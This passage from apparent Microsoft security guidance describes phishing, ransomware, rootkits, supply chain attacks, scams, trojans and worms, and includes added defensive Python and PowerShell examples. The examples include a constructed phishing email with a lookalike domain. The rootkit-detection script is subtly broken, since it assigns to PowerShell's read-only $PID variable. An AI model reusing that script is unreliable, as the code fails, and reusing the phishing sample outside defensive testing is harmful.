and never provide sensitive or personal information through email or unknown websites, or over the phone.
Remember, phishing emails are designed to appear legitimate.
Awareness
The best protection is awareness and education. Don’t open attachments or click links in unsolicited emails, even if
the emails came from a recognized source. If the email is unexpected, be wary about opening the attachment and
verify the URL.
Enterprises should educate and train their employees to be wary of any communication that requests personal or
financial information, and instruct them to report the threat to the company’s security operations team
immediately.
Here are several telltale signs of a phishing scam:
The links or URLs provided in emails are not pointing to the correct location or are attempting to have
you access a third-party site that is not affiliated with the sender of the email. For example, in the image
below the URL provided does not match the URL that you will be taken to.

There is a request for personal information such as social security numbers or bank or financial
information. Official communications won't generally request personal information from you in the form of
an email.
The email address is altered so that it looks similar to a legitimate email address but has added numbers or
changed letters.
The message is unexpected and unsolicited. If you suddenly receive an email from an entity or a person
you rarely deal with, consider this email suspect.
The message or the attachment asks you to enable macros, adjust security settings, or install
applications. Normal emails will not ask you to do this.
The message contains errors. Legitimate corporate messages are less likely to have typographic or
grammatical errors or contain wrong information.
The sender address does not match the signature on the message itself. For example, an email is
purported to be from Mary of Contoso Corp, but the sender address is john@example.com.
There are multiple recipients in the “To” field and they appear to be random addresses. Corporate
messages are normally sent directly to individual recipients.
The greeting on the message itself does not personally address you. Apart from messages that
mistakenly address a different person, those that misuse your name or pull your name directly from your
email address tend to be malicious.
The website looks familiar but there are inconsistencies or things that are not quite right, such as
outdated logos, typos, or requests for additional information that legitimate sign-in websites do not ask
for.
The page that opens is not a live page but rather an image that is designed to look like the site you are
familiar with. A pop-up may appear that requests credentials.
If in doubt, contact the business by known channels to verify if any suspicious emails are in fact legitimate.
For more information, download and read this Microsoft e-book on preventing social engineering attacks,
especially in enterprise environments.
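Several of the signs listed above (link text that does not match its destination, a sender address that does not match the claimed sender, an address with altered letters, a generic greeting, a request to enable macros) can be checked mechanically before a message reaches a person. The Python below is an added example written for this page, not code from Microsoft, Exchange Online Protection or Office 365 ATP: it parses a constructed raw email with the standard library and returns the indicators it finds. The trusted-domain list, the two-edit lookalike threshold and the two sample messages are assumptions of the example.

```python
import email
import email.utils
import re
from email import policy
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Domains this organization expects mail from; constructed for the example.
TRUSTED_DOMAINS = {"contoso.com", "example.com"}
# Anchor text that itself looks like a URL or domain, so it can be compared with its href.
DOMAIN_LIKE = re.compile(r"(?:https?://)?[\w.-]+\.[a-z]{2,}(?:[/?#]\S*)?", re.I)


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML body."""
    def __init__(self):
        super().__init__()
        self.links: List[Tuple[str, str]] = []
        self._href: Optional[str] = None
        self._text: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href") or "", []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(value: str) -> str:
    """Host of a URL or bare domain, lower-cased, without a leading www."""
    v = value.strip()
    host = (urlparse(v if "://" in v else "http://" + v).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host


def address_domain(header) -> str:
    """Domain part of an address header such as '"Mary" <mary@contoso.com>'."""
    addr = email.utils.parseaddr(str(header or ""))[1]
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; a small value against a trusted domain means a lookalike."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def phishing_indicators(raw_message: str) -> List[Tuple[str, str]]:
    """Return (indicator, detail) pairs for the telltale signs that can be checked mechanically."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    found: List[Tuple[str, str]] = []
    from_name = email.utils.parseaddr(str(msg["From"] or ""))[0]
    from_domain, reply_domain = address_domain(msg["From"]), address_domain(msg["Reply-To"])
    if reply_domain and reply_domain != from_domain:
        found.append(("reply-to-mismatch", f"replies go to {reply_domain}, not {from_domain}"))
    for trusted in sorted(TRUSTED_DOMAINS):
        if from_domain == trusted:
            continue
        if trusted.split(".")[0] in from_name.lower():  # display name claims a trusted company
            found.append(("display-name-mismatch", f"'{from_name}' sent from {from_domain}"))
        if edit_distance(from_domain, trusted) <= 2:  # added digits or swapped letters
            found.append(("lookalike-domain", f"{from_domain} resembles {trusted}"))
    body = msg.get_body(preferencelist=("html", "plain"))
    html = body.get_content() if body is not None else ""
    anchors = AnchorCollector()
    anchors.feed(html)
    for href, text in anchors.links:
        if DOMAIN_LIKE.fullmatch(text) and host_of(text) != host_of(href):
            found.append(("link-text-mismatch", f"shows {host_of(text)}, goes to {host_of(href)}"))
    if re.search(r"\bdear (customer|user|client|member|account holder)\b", html, re.I):
        found.append(("generic-greeting", "recipient is not addressed by name"))
    if re.search(r"\benable (macros|content|editing)\b", html, re.I):
        found.append(("asks-to-enable-content", "message asks to enable macros or content"))
    return found


# Constructed sample messages; domains and people are fictitious.
SUSPICIOUS_MESSAGE = """\
From: "Contoso Billing" <billing@contosso.com>
Reply-To: collect@mailer.example.net
To: alex@example.com
Subject: Outstanding invoice
Content-Type: text/html; charset="utf-8"

<html><body><p>Dear Customer,</p><p>Your invoice is overdue. Pay at
<a href="http://portal.contosso.com/login">https://www.contoso.com/billing</a>.</p></body></html>
"""
CLEAN_MESSAGE = """\
From: Mary <mary@contoso.com>
To: alex@example.com
Subject: Q3 report
Content-Type: text/html; charset="utf-8"

<html><body><p>Hi Alex,</p><p>The report is at
<a href="https://www.contoso.com/reports/q3">https://www.contoso.com/reports/q3</a>.</p></body></html>
"""
```

None of these indicators is proof on its own; the value is in how many fire at once on one message, which is why the function returns all of them rather than a single verdict, leaving the threshold to the mail pipeline or analyst.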
Software solutions for organizations
Microsoft Edge and Windows Defender Application Guard offer protection from the increasing threat of
targeted attacks using Microsoft's industry leading Hyper-V virtualization technology. If a browsed website
is deemed untrusted, the Hyper-V container will isolate that device from the rest of your network thereby
preventing access to your enterprise data.
Microsoft Exchange Online Protection (EOP) offers enterprise-class reliability and protection against spam
and malware, while maintaining access to email during and after emergencies. Using various layers of
filtering, EOP can provide different controls for spam filtering, such as bulk mail controls and international
spam, that will further enhance your protection services.
Use Office 365 Advanced Threat Protection (ATP) to help protect your email, files, and online storage
against malware. It offers holistic protection in Microsoft Teams, Word, Excel, PowerPoint, Visio, SharePoint
Online, and OneDrive for Business. By protecting against unsafe attachments and expanding protection
against malicious links, it complements the security features of Exchange Online Protection to provide
better zero-day protection.
For more tips and software solutions, see prevent malware infection.

What do I do if I've already been a victim of a phishing scam?


If you feel that you have been a victim of a phishing attack, contact your IT Admin. You should also immediately
change all passwords associated with the accounts, and report any fraudulent activity to your bank, credit card
company, etc.
Reporting spam
Submit phishing scam emails to Microsoft by sending an email with the scam as an attachment to:
phish@office365.microsoft.com. For more information on submitting messages to Microsoft, see Submit spam,
non-spam, and phishing scam messages to Microsoft for analysis.
For Outlook and Outlook on the web users, use the Report Message Add-in for Microsoft Outlook. For
information about how to install and use this tool, see Enable the Report Message add-in.
Send an email with the phishing scam to The Anti-Phishing Working Group: reportphishing@apwg.org. The
group uses reports generated from emails sent to fight phishing scams and hackers. ISPs, security vendors,
financial institutions and law enforcement agencies are involved.

Where to find more information about phishing attacks


For information on the latest Phishing attacks, techniques, and trends, you can read these entries on the Windows
Security blog:
Phishers unleash simple but effective social engineering techniques using PDF attachments
Tax themed phishing and malware attacks proliferate during the tax filing season
Phishing like emails lead to tech support scam
Ransomware
4/8/2019 • 2 minutes to read

Ransomware is a type of malware that encrypts files and folders, preventing access to important files.
Ransomware attempts to extort money from victims by demanding payment, usually in the form of cryptocurrency, in
exchange for the decryption key. But cybercriminals won't always follow through and unlock the files they
encrypted.
The trend towards increasingly sophisticated malware behavior, highlighted by the use of exploits and other attack
vectors, makes older platforms especially susceptible to ransomware attacks.

How ransomware works


Most ransomware infections start with:
Email messages with attachments that try to install ransomware.
Websites hosting exploit kits that attempt to use vulnerabilities in web browsers and other software to
install ransomware.
Once ransomware infects a device, it starts encrypting files, folders, or entire hard drive partitions using encryption
algorithms like RSA or RC4.
Ransomware is one of the most lucrative revenue channels for cybercriminals, so malware authors continually
improve their malware code to better target enterprise environments. Ransomware-as-a-service is a cybercriminal
business model in which malware creators sell their ransomware and other services to cybercriminals, who then
operate the ransomware attacks. The business model also defines profit sharing between the malware creators,
ransomware operators, and other parties that may be involved. For cybercriminals, ransomware is a big business,
at the expense of individuals and businesses.
Examples
Sophisticated ransomware like Spora, WannaCrypt (also known as WannaCry), and Petya (also known as
NotPetya) spread to other computers via network shares or exploits.
Spora drops ransomware copies in network shares.
WannaCrypt exploits the Server Message Block (SMB) vulnerability CVE-2017-0144 (also called
EternalBlue) to infect other computers.
A Petya variant exploits the same vulnerability, in addition to CVE-2017-0145 (also known as
EternalRomance), and uses stolen credentials to move laterally across networks.
Older ransomware like Reveton locks screens instead of encrypting files. They display a full screen image and
then disable Task Manager. The files are safe, but they are effectively inaccessible. The image usually contains a
message claiming to be from law enforcement that says the computer has been used in illegal cybercriminal
activities and a fine needs to be paid. Because of this, Reveton is nicknamed "Police Trojan" or "Police ransomware".
Ransomware like Cerber and Locky search for and encrypt specific file types, typically document and media files.
When the encryption is complete, the malware leaves a ransom note using text, image, or an HTML file with
instructions to pay a ransom to recover files.
Bad Rabbit ransomware was discovered attempting to spread across networks using hardcoded usernames and
passwords in brute force attacks.
How to protect against ransomware
Organizations can be targeted specifically by attackers, or they can be caught in the wide net cast by cybercriminal
operations. Large organizations are high value targets and attackers can demand bigger ransoms.
We recommend:
Back up important files regularly. Use the 3-2-1 rule. Keep three backups of your data, on two different
storage types, and at least one backup offsite.
Apply the latest updates to your operating systems and apps.
Educate your employees so they can identify social engineering and spear-phishing attacks.
Use controlled folder access. It can stop ransomware from encrypting files and holding the files for ransom.
For more general tips, see prevent malware infection.
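The controlled folder access recommendation above can be rolled out in stages from PowerShell. The script below is an added example, not part of the original article: it first puts the feature into audit mode, adds the folders to protect and a line-of-business app that is allowed to write to them, and then reads the Windows Defender operational log to see what would have been blocked before switching to enforcement. The folder and application paths are placeholders for your own environment; the event IDs 1123 (blocked) and 1124 (audited) are the ones Windows Defender writes for this feature. Run it in an elevated session.

```powershell
# Added example: staged rollout of controlled folder access (requires an elevated session).
# Paths below are placeholders; replace them with your own protected folders and trusted apps.
$ProtectedFolders = @('D:\Finance\Shared', 'D:\Engineering\Designs')   # placeholder folders
$TrustedApps      = @('C:\Program Files\Contoso\LobApp\LobApp.exe')   # placeholder trusted app

function Enable-ControlledFolderAccessAudit {
    # Audit mode records what would be blocked without actually blocking it.
    Set-MpPreference -EnableControlledFolderAccess AuditMode
    Add-MpPreference -ControlledFolderAccessProtectedFolders $ProtectedFolders
    Add-MpPreference -ControlledFolderAccessAllowedApplications $TrustedApps
}

function Get-ControlledFolderAccessEvents {
    param([int]$Hours = 24)
    # 1123 = write blocked (enforce mode), 1124 = write audited (audit mode).
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1123, 1124
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, Message |
        Sort-Object TimeCreated -Descending
}

function Enable-ControlledFolderAccessEnforce {
    # Switch to enforcement once the audit log shows only expected writers.
    Set-MpPreference -EnableControlledFolderAccess Enabled
}

# Typical sequence: audit for a few days, review, then enforce.
Enable-ControlledFolderAccessAudit
Get-ControlledFolderAccessEvents -Hours 72 | Format-Table -AutoSize
# Enable-ControlledFolderAccessEnforce   # uncomment after reviewing the audit events

# Confirm the resulting configuration.
Get-MpPreference | Select-Object EnableControlledFolderAccess,
    ControlledFolderAccessProtectedFolders, ControlledFolderAccessAllowedApplications
```

Audit mode first matters because backup agents, document management tools and build systems routinely write to user folders; enforcing without a review period turns those into support tickets rather than blocked ransomware.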
Rootkits
4/8/2019 • 2 minutes to read • Edit Online

Malware authors use rootkits to hide malware on your device, allowing malware to persist as long as possible. A
successful rootkit can potentially remain in place for years if it is undetected. During this time it will steal
information and resources.

How rootkits work


Rootkits intercept and change standard operating system processes. After a rootkit infects a device, you can’t trust
any information that device reports about itself.
For example, if you were to ask a device to list all of the programs that are running, the rootkit might stealthily
remove any programs it doesn’t want you to know about. Rootkits are all about hiding things. They want to hide
both themselves and their malicious activity on a device.
Many modern malware families use rootkits to try and avoid detection and removal, including:
Alureon
Cutwail
Datrahere (Zacinlo)
Rustock
Sinowal
Sirefef
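The point that a compromised device cannot be trusted to report on itself is the basis of a classic defensive heuristic: enumerate the same thing through several independent paths and look for entries that appear in one view but not another. The script below is an added example, not from the article, that compares the running-process list as seen by Get-Process, by WMI (Win32_Process) and by the tasklist utility. Processes that start or exit between the three snapshots will show up as transient noise, so only a discrepancy that persists across repeated runs is worth investigating, and a rootkit that hooks the kernel path all three rely on will hide from all of them, which is why the article's advice to boot into a known-trusted environment such as Windows Defender Offline still applies.

```powershell
# Added example: cross-view comparison of process listings as a rootkit heuristic.
function Get-ProcessViewDiscrepancies {
    # Three snapshots taken as close together as possible.
    $fromApi  = Get-Process | Select-Object -ExpandProperty Id
    $fromWmi  = Get-CimInstance -ClassName Win32_Process | Select-Object -ExpandProperty ProcessId
    # tasklist CSV output without a header row; supply the column names ourselves.
    $fromTask = tasklist /FO CSV /NH |
        ConvertFrom-Csv -Header ImageName, PID, SessionName, SessionNum, MemUsage |
        ForEach-Object { [int]$_.PID }

    $all = ($fromApi + $fromWmi + $fromTask) | Sort-Object -Unique
    foreach ($pid in $all) {
        $inApi  = $fromApi  -contains $pid
        $inWmi  = $fromWmi  -contains $pid
        $inTask = $fromTask -contains $pid
        # Only report PIDs missing from at least one view.
        if (-not ($inApi -and $inWmi -and $inTask)) {
            [pscustomobject]@{
                PID         = $pid
                GetProcess  = $inApi
                WMI         = $inWmi
                Tasklist    = $inTask
            }
        }
    }
}

function Get-PersistentDiscrepancies {
    param([int]$Rounds = 3, [int]$DelaySeconds = 2)
    # Repeat the comparison and keep only PIDs that are inconsistent every time;
    # this filters out processes that merely started or exited between snapshots.
    $seen = @{}
    for ($i = 0; $i -lt $Rounds; $i++) {
        foreach ($d in Get-ProcessViewDiscrepancies) {
            $seen[$d.PID] = 1 + ($seen[$d.PID] ?? 0)
        }
        Start-Sleep -Seconds $DelaySeconds
    }
    $seen.GetEnumerator() | Where-Object { $_.Value -eq $Rounds } |
        ForEach-Object { $_.Key }
}

Get-PersistentDiscrepancies | ForEach-Object { "Persistent discrepancy for PID $_" }
```

The `??` null-coalescing operator requires PowerShell 7; on Windows PowerShell 5.1 replace that line with an explicit `if ($seen.ContainsKey(...))` check. An empty result does not prove the absence of a rootkit; a non-empty, persistent one is a reason to take the device offline and scan it from trusted media.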

How to protect against rootkits


Like any other type of malware, the best way to avoid rootkits is to prevent them from being installed in the first place.
Apply the latest updates to operating systems and apps.
Educate your employees so they can be wary of suspicious websites and emails.
Back up important files regularly. Use the 3-2-1 rule. Keep three backups of your data, on two different
storage types, and at least one backup offsite.
For more general tips, see prevent malware infection.
What if I think I have a rootkit on my device?
Microsoft security software includes a number of technologies designed specifically to remove rootkits. If you think
you might have a rootkit on your device and your antimalware software isn’t detecting it, you might need an extra
tool that lets you boot to a known trusted environment.
Windows Defender Offline can be launched from Windows Security Center and has the latest anti-malware
updates from Microsoft. It’s designed to be used on devices that aren't working correctly due to a possible
malware infection.
System Guard in Windows 10 protects against rootkits and threats that impact system integrity.
What if I can’t remove a rootkit?
If the problem persists, we strongly recommend reinstalling the operating system and security software. You
should then restore your data from a backup.
Supply chain attacks

Supply chain attacks are an emerging kind of threat that targets software developers and suppliers. The goal is to
access source code, build processes, or update mechanisms by infecting legitimate apps to distribute malware.

How supply chain attacks work


Attackers hunt for unsecure network protocols, unprotected server infrastructures, and unsafe coding practices.
They break in, change source code, and hide malware in build and update processes.
Because software is built and released by trusted vendors, these apps and updates are signed and certified. In
software supply chain attacks, vendors are likely unaware that their apps or updates are infected with malicious
code when they’re released to the public. The malicious code then runs with the same trust and permissions as the
app.
The number of potential victims is significant, given the popularity of some apps. A case occurred where a free file
compression app was poisoned and deployed to customers in a country where it was the top utility app.
Types of supply chain attacks
Compromised software building tools or update infrastructure
Stolen code-signing certificates, or malicious apps signed using the identity of the development company
Compromised specialized code shipped into hardware or firmware components
Pre-installed malware on devices (cameras, USB, phones, etc.)
To learn more about supply chain attacks, read this blog post called attack inception: compromised supply chain
within a supply chain poses new risks.

How to protect against supply chain attacks


Deploy strong code integrity policies to allow only authorized apps to run.
Use endpoint detection and response solutions that can automatically detect and remediate suspicious
activities.
For software vendors and developers
Maintain a highly secure build and update infrastructure.
Immediately apply security patches for OS and software.
Implement mandatory integrity controls to ensure only trusted tools run.
Require multi-factor authentication for admins.
Build secure software updaters as part of the software development lifecycle.
Require SSL for update channels and implement certificate pinning.
Sign everything, including configuration files, scripts, XML files, and packages.
Check for digital signatures, and don’t let the software updater accept generic input and commands.
Develop an incident response process for supply chain attacks.
Disclose supply chain incidents and notify customers with accurate and timely information.
For more general tips on protecting your systems and devices, see prevent malware infection.
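Three of the vendor recommendations above (sign everything, check digital signatures, and don't let the updater accept generic input) come together in how an updater validates a package before it installs it. The function below is an added example written for this article, not code from any Microsoft product: it accepts only a file path, refuses the package unless its Authenticode signature is valid, the signing certificate's thumbprint matches the one pinned in the updater, and the SHA-256 hash matches the value published in the signed manifest. The thumbprint and hash values shown in the usage are placeholders.

```powershell
# Added example: validating an update package before installation.
function Test-UpdatePackage {
    param(
        [Parameter(Mandatory)] [string] $Path,
        # Thumbprint of the vendor's code-signing certificate, pinned in the updater.
        [Parameter(Mandatory)] [string] $ExpectedSignerThumbprint,
        # SHA-256 published in the (itself signed) update manifest.
        [Parameter(Mandatory)] [string] $ExpectedSha256
    )

    # Only a concrete file path is accepted; no commands, no wildcards.
    if (-not (Test-Path -LiteralPath $Path -PathType Leaf)) {
        Write-Warning "Package not found: $Path"
        return $false
    }

    # 1. The Authenticode signature must chain to a trusted root and be intact.
    $sig = Get-AuthenticodeSignature -FilePath $Path
    if ($sig.Status -ne 'Valid') {
        Write-Warning "Signature status is '$($sig.Status)', expected 'Valid'."
        return $false
    }

    # 2. A valid signature from the wrong signer is still a rejection:
    #    this is the certificate-pinning step for the package itself.
    if ($sig.SignerCertificate.Thumbprint -ne $ExpectedSignerThumbprint) {
        Write-Warning "Signer thumbprint $($sig.SignerCertificate.Thumbprint) does not match the pinned value."
        return $false
    }

    # 3. The content hash must match what the signed manifest advertised,
    #    so a re-signed but different binary is also rejected.
    $actual = (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash
    if ($actual -ne $ExpectedSha256) {
        Write-Warning "SHA-256 mismatch: got $actual."
        return $false
    }

    return $true
}

# Usage with placeholder values (replace with your own pinned thumbprint and manifest hash).
$package = Join-Path $env:TEMP 'contoso-update-1.2.3.msi'        # placeholder path
$ok = Test-UpdatePackage -Path $package `
        -ExpectedSignerThumbprint 'PLACEHOLDER_SIGNER_THUMBPRINT' `
        -ExpectedSha256 'PLACEHOLDER_SHA256_FROM_MANIFEST'
if ($ok) { "Package passed validation; safe to hand to the installer." }
else     { "Package rejected; do not install." }
```

The thumbprint check is what turns "signed" into "signed by us": stolen or fraudulently issued certificates from other organizations produce a valid signature but a different thumbprint. Keep the pinned thumbprint in the updater binary rather than in a downloadable configuration file, unless that file is itself covered by the same signature check.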
Tech support scams

Tech support scams are an industry-wide issue where scammers use scare tactics to trick users into paying for
unnecessary technical support services that supposedly fix contrived device, platform, or software problems.

How tech support scams work


Scammers may call you directly on your phone and pretend to be representatives of a software company. They
might even spoof the caller ID so that it displays a legitimate support phone number from a trusted company.
They can then ask you to install applications that give them remote access to your device. Using remote access,
these experienced scammers can misrepresent normal system output as signs of problems.
Scammers might also initiate contact by displaying fake error messages on websites you visit, displaying support
numbers and enticing you to call. They can also put your browser on full screen and display pop-up messages that
won't go away, essentially locking your browser. These fake error messages aim to trick you into calling an
indicated technical support hotline. Note that Microsoft error and warning messages never include phone
numbers.
When you engage with the scammers, they can offer fake solutions for your “problems” and ask for payment in
the form of a one-time fee or subscription to a purported support service.
For more information, view known tech support scam numbers and popular web scams.

How to protect against tech support scams


Share and implement the general tips on how to prevent malware infection.
It is also important to keep the following in mind:
Microsoft does not send unsolicited email messages or make unsolicited phone calls to request personal or
financial information, or to fix your computer.
Any communication with Microsoft has to be initiated by you.
Don’t call the number in the pop-ups. Microsoft’s error and warning messages never include a phone
number.
Download software only from official vendor websites or the Microsoft Store. Be wary of downloading
software from third-party sites, as some of them might have been modified without the author’s knowledge
to bundle support scam malware and other threats.
Use Microsoft Edge when browsing the internet. It blocks known support scam sites using Windows
Defender SmartScreen (which is also used by Internet Explorer). Furthermore, Microsoft Edge can stop
pop-up dialogue loops used by these sites.
Enable Windows Defender Antivirus in Windows 10. It detects and removes known support scam malware.

What to do if information has been given to a tech support person


Uninstall applications that scammers asked you to install. If remote access has been granted, consider resetting the
device.
Run a full scan with Windows Defender Antivirus to remove any malware. Apply all security updates as
soon as they are available.
Change passwords.
Call your credit card provider to reverse the charges, if you have already paid.
Monitor anomalous logon activity. Use Windows Defender Firewall to block traffic to services that you
would not normally access.
Reporting tech support scams
Help Microsoft stop scammers, whether they claim to be from Microsoft or from another tech company, by
reporting tech support scams:
www.microsoft.com/reportascam
You can also report any unsafe website that you suspect is a phishing website or contains malicious content
directly to Microsoft by filling out a Report an unsafe site form or using built in web browser functionality.
Trojans

Trojans are a common type of malware which, unlike viruses, can’t spread on their own. This means they either
have to be downloaded manually or another malware needs to download and install them.
Trojans often use the same file names as real and legitimate apps. It is easy to accidentally download a trojan
thinking that it is a legitimate app.

How trojans work


Trojans can come in many different varieties, but generally they do the following:
Download and install other malware, such as viruses or worms.
Use the infected device for click fraud.
Record keystrokes and websites visited.
Send information about the infected device to a malicious hacker including passwords, login details for
websites, and browsing history.
Give a malicious hacker control over the infected device.

How to protect against trojans


Use the following free Microsoft software to detect and remove them:
Windows Defender Antivirus for Windows 10 and Windows 8.1, or Microsoft Security Essentials for
previous versions of Windows.
Microsoft Safety Scanner
For more general tips, see prevent malware infection.
Unwanted software

Unwanted software is a class of programs that alter the Windows experience without your consent or control. This can take
the form of a modified browsing experience, lack of control over downloads and installation, misleading messages,
or unauthorized changes to Windows settings.

How unwanted software works


Unwanted software can be introduced when a user searches for and downloads applications from the internet.
Some applications are software bundlers, which means that they are packed with other applications. As a result,
other programs can be inadvertently installed when the original application is downloaded.
Here are some indications of unwanted software:
There are programs that you did not install and that may be difficult to uninstall
Browser features or settings have changed, and you can’t view or modify them
There are excessive messages about your device's health or about files and programs
There are ads that cannot be easily closed
Some indicators are harder to recognize because they are less disruptive, but are still unwanted. For example,
unwanted software can modify web pages to display specific ads, monitor browsing activities, or remove control of
the browser.
Microsoft uses extensive evaluation criteria to identify unwanted software.

How to protect against unwanted software


To prevent unwanted software infection, download software only from official websites, or from the Microsoft
Store. Be wary of downloading software from third-party sites.
Use Microsoft Edge when browsing the internet. Microsoft Edge includes additional protections that effectively
block browser modifiers that can change your browser settings. Microsoft Edge also blocks known websites
hosting unwanted software using SmartScreen (also used by Internet Explorer).
Enable Windows Defender AV in Windows 10. It provides real-time protection against threats and detects and
removes known unwanted software.
Download Microsoft Security Essentials for real-time protection in Windows 7 or Windows Vista.
For more general tips, see prevent malware infection.
What should I do if my device is infected?
If you suspect that you have unwanted software, you can submit files for analysis.
Some unwanted software adds uninstallation entries, which means that you can remove them using Settings.
1. Select the Start button
2. Go to Settings > Apps > Apps & features.
3. Select the app you want to uninstall, then click Uninstall.
If you only recently noticed symptoms of unwanted software infection, consider sorting the apps by install date,
and then uninstall the most recent apps that you did not install.
You may also need to remove browser add-ons in your browsers, such as Internet Explorer, Firefox, or Chrome.
In case threat removal is unsuccessful, read about troubleshooting malware detection and removal problems.
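Both the tech support scam clean-up steps (uninstall what the scammer asked you to install) and the unwanted software steps above (sort apps by install date and remove the most recent ones you did not install) come down to the same question: what was installed recently? The function below is an added example, not part of the article, that answers it from the registry Uninstall keys Settings itself reads (machine-wide 64-bit and 32-bit keys plus the per-user key). Entries that carry no InstallDate value are omitted from the result, so use it alongside Settings rather than instead of it.

```powershell
# Added example: list recently installed applications from the registry Uninstall keys.
function Get-RecentlyInstalledApp {
    param([int]$Days = 30)

    $uninstallKeys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'
    )
    $cutoff = (Get-Date).AddDays(-$Days)

    Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName } |
        ForEach-Object {
            # InstallDate is stored as yyyyMMdd; skip entries without a parseable date.
            $installed = $null
            if ($_.InstallDate -match '^\d{8}$') {
                $installed = [datetime]::ParseExact($_.InstallDate, 'yyyyMMdd', $null)
            }
            [pscustomobject]@{
                Name            = $_.DisplayName
                Publisher       = $_.Publisher
                InstallDate     = $installed
                UninstallString = $_.UninstallString
                Scope           = if ($_.PSPath -like '*HKEY_CURRENT_USER*') { 'User' } else { 'Machine' }
            }
        } |
        Where-Object { $_.InstallDate -and $_.InstallDate -ge $cutoff } |
        Sort-Object InstallDate -Descending
}

# Everything installed in the last two weeks, newest first. Entries with an empty
# Publisher, or a publisher you do not recognize, are the ones to look at first.
Get-RecentlyInstalledApp -Days 14 |
    Format-Table InstallDate, Name, Publisher, Scope -AutoSize
```

The UninstallString column is what Settings runs when you click Uninstall; reviewing it before running it is worthwhile, because unwanted software sometimes points that string at its own installer rather than at a genuine uninstaller.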
Worms

A worm is a type of malware that can copy itself and often spreads through a network by exploiting security
vulnerabilities. It can spread through email attachments, text messages, file-sharing programs, social networking
sites, network shares, removable drives, and software vulnerabilities.

How worms work


Worms represent a large category of malware. Different worms use different methods to infect devices.
Depending on the variant, they can steal sensitive information, change security settings, send information to
malicious hackers, stop users from accessing files, and other malicious activities.
Jenxcus (also known as Dunihi), Gamarue (also known as Androm), and Bondat have consistently remained at the
top of the list of malware that infect users running Microsoft security software. Although these worms share some
commonalities, it is interesting to note that they also have distinct characteristics.
Jenxcus has capabilities of not only infecting removable drives but can also act as a backdoor that connects
back to its server. This threat typically gets into a device from a drive-by download attack, meaning it's
installed when users just visit a compromised web page.
Gamarue typically arrives through spam campaigns, exploits, downloaders, social networking sites, and
removable drives. When Gamarue infects a device, it becomes a distribution channel for other malware.
We’ve seen it distribute other malware such as infostealers, spammers, clickers, downloaders, and rogues.
Bondat typically arrives through fictitious Nullsoft Scriptable Install System (NSIS), Java installers, and
removable drives. When Bondat infects a system, it gathers information about the machine such as device
name, Globally Unique Identifier (GUID), and OS build. It then sends that information to a remote server.
Both Bondat and Gamarue have clever ways of obscuring themselves to evade detection. By hiding what they are
doing, they try to avoid detection by security software.
WannaCrypt also deserves a mention here. Unlike older worms that often spread just because they could,
modern worms often spread to drop a payload (e.g. ransomware).
This image shows how a worm can quickly spread through a shared USB drive.
Figure: a worm spreading from a shared USB drive.
How to protect against worms
Enable Windows Defender AV in Windows 10. It provides real-time protection against threats and detects and
removes known unwanted software.
Download Microsoft Security Essentials for real-time protection in Windows 7 or Windows Vista.
In case threat removal is unsuccessful, read about troubleshooting malware detection and removal problems.
For more general tips, see prevent malware infection.
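Jenxcus, Gamarue and Bondat all use removable drives as one of their routes onto a device, and the figure above shows why a shared USB drive is such an effective carrier. The script below is an added example, not part of the article: it checks whether AutoRun is disabled for all drive types through the NoDriveTypeAutoRun policy value (0xFF), sets it if needed, and then runs a Windows Defender custom scan over every removable volume that is currently attached, flagging any drive that carries an autorun.inf at its root. It requires an elevated session to change the policy.

```powershell
# Added example: harden against worms that spread via removable drives.
$PolicyKey  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
$PolicyName = 'NoDriveTypeAutoRun'
$AllDrives  = 0xFF   # bitmask: AutoRun disabled for every drive type

function Get-AutoRunPolicy {
    # Returns the current policy value, or $null when the value has never been set.
    $item = Get-ItemProperty -Path $PolicyKey -Name $PolicyName -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$PolicyName
}

function Disable-AutoRunAllDrives {
    if (-not (Test-Path $PolicyKey)) { New-Item -Path $PolicyKey -Force | Out-Null }
    Set-ItemProperty -Path $PolicyKey -Name $PolicyName -Value $AllDrives -Type DWord
}

function Get-RemovableDrive {
    # DriveType 2 = removable disk in Win32_LogicalDisk.
    Get-CimInstance -ClassName Win32_LogicalDisk -Filter 'DriveType = 2' |
        Select-Object -ExpandProperty DeviceID
}

function Invoke-RemovableDriveCheck {
    foreach ($drive in Get-RemovableDrive) {
        $root = "$drive\"
        $autorun = Join-Path $root 'autorun.inf'
        # autorun.inf at the root is a classic worm artifact on a removable drive.
        if (Test-Path -LiteralPath $autorun) {
            Write-Warning "$drive carries an autorun.inf at its root; treat it as suspect."
        }
        # Custom Windows Defender scan limited to this volume.
        Start-MpScan -ScanType CustomScan -ScanPath $root
        [pscustomobject]@{ Drive = $drive; HasAutorunInf = (Test-Path -LiteralPath $autorun) }
    }
}

# 1. Make sure AutoRun is off for every drive type.
$current = Get-AutoRunPolicy
if ($current -ne $AllDrives) {
    "NoDriveTypeAutoRun is '$current'; setting it to 0xFF."
    Disable-AutoRunAllDrives
} else {
    'AutoRun is already disabled for all drive types.'
}

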